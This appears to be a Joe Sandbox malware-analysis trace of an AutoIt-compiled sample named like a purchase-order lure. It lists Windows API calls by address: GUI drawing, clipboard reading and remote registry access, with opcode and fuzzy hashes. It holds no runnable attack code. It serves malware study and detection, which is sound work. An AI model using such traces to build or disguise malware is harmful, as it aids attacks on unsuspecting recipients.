                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                    • _wcslen.LIBCMT ref: 00459916
                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                    • API String ID: 4040870279-2373415609
                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                    • String ID:
                                                    • API String ID: 69173610-0
                                                    • Opcode ID: 48fd73e387246f87b58864884df5ee337fd89055d1a359018ab7483993a2f074
                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                    • Opcode Fuzzy Hash: 48fd73e387246f87b58864884df5ee337fd89055d1a359018ab7483993a2f074
                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                    APIs
                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                    • API String ID: 2910397461-517079104
                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-3360698832
                                                    • Opcode ID: 7c4153de5aac5a6f6683c87829e90f4d03aa6f603926696f14061938e7bc4c0c
                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                    • Opcode Fuzzy Hash: 7c4153de5aac5a6f6683c87829e90f4d03aa6f603926696f14061938e7bc4c0c
                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                    APIs
                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Cursor$Load
                                                    • String ID:
                                                    • API String ID: 1675784387-0
                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                    APIs
                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID:
                                                    • API String ID: 1582027408-0
                                                    • Opcode ID: dff20096bd5e92af5fac991b491365de6cb937f55e2255b8c980abfa3172f9e0
                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                    • Opcode Fuzzy Hash: dff20096bd5e92af5fac991b491365de6cb937f55e2255b8c980abfa3172f9e0
                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                    APIs
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: CloseConnectCreateRegistry
                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                    • API String ID: 3217815495-966354055
                                                    • Opcode ID: 8dcd1ae9babf70396529563c5406eb2540146bdbbecf2792358affe534d3a383
                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                    • Opcode Fuzzy Hash: 8dcd1ae9babf70396529563c5406eb2540146bdbbecf2792358affe534d3a383
                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                    • DestroyWindow.USER32(?), ref: 00456746
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                    • String ID: ($,$tooltips_class32
                                                    • API String ID: 225202481-3320066284
                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                    APIs
                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2501080956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2501062973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501125268.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501143888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501168654.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501186437.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2501220147.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_[Purchase Order] PO2411024.jbxd
                                                    Similarity
                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                    • String ID:
                                                    • API String ID: 15083398-0
                                                    • Opcode ID: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                    • Opcode Fuzzy Hash: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                    Strings
                                                    Memory Dump Source
